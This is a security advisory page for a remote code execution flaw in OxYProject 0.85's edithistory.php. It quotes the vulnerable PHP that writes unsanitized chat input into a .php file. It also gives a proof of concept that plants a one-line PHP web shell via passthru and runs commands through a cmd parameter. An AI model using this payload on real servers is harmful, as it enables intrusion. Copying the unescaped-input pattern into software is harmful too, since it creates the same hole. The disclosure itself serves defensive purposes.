OxYProject 0.85 (edithistory.php) Remote Code Execution Vulnerability

2009.04.09
Credit: Anon
Risk: High
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

OxYProject 0.85 (edithistory.php) Remote Code Execution Vulnerability Script : http://puzzle.dl.sourceforge.net/sourceforge/oxyproject/OxYBox085uns.zip Code Vuln : ###################Ln 24################### include('oxycfg.php'); //######################################## // Editing the Chat History //######################################## $edit_file = $file['Chat_History']; $fh = fopen($edit_file, 'a') or die("<meta http-equiv=\"refresh\" content=\"1 ;url=oxybox_submit.php\"><font face=\"arial\">Error occured when submitting your message. <a href=\"javascript: history.go(-1)\">Back</a></font>"); fwrite($fh, "<b><font face=\"arial\" color=" . $_POST["usercolor"] . ">" . $_POST["oxyname"] . " :</font></b> <font color=" . $_POST["msgcolor"] . ">" . $_POST["oxymsg"] . "</font><br>"); fclose($fh); ###################Ln 33################### In The Page "oxycfg.php" ###################Ln 33################### $file['Chat_History'] = "oxyhistory.php"; ###################Ln 23################### POC : Go :-> http://localhost/1/OxYBox085uns/0.85/edithistory.php You'll see In this Page Username [?] Your message has been successfully submitted [X] Your Message Here Username Color [?] black Enter Message In The "Username" Write "Gold_M" In The "Your Message Here" Write This Code "<?php passthru($_GET[cmd]); ?>" Afte All this Click "Enter Message" Now Go :-> http://localhost/OxYBox085uns/0.85/oxyhistory.php?cmd=dir # Thanx To TryagOxY

References:

http://xforce.iss.net/xforce/xfdb/42110
http://www.securityfocus.com/bid/28992
http://www.milw0rm.com/exploits/5524


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top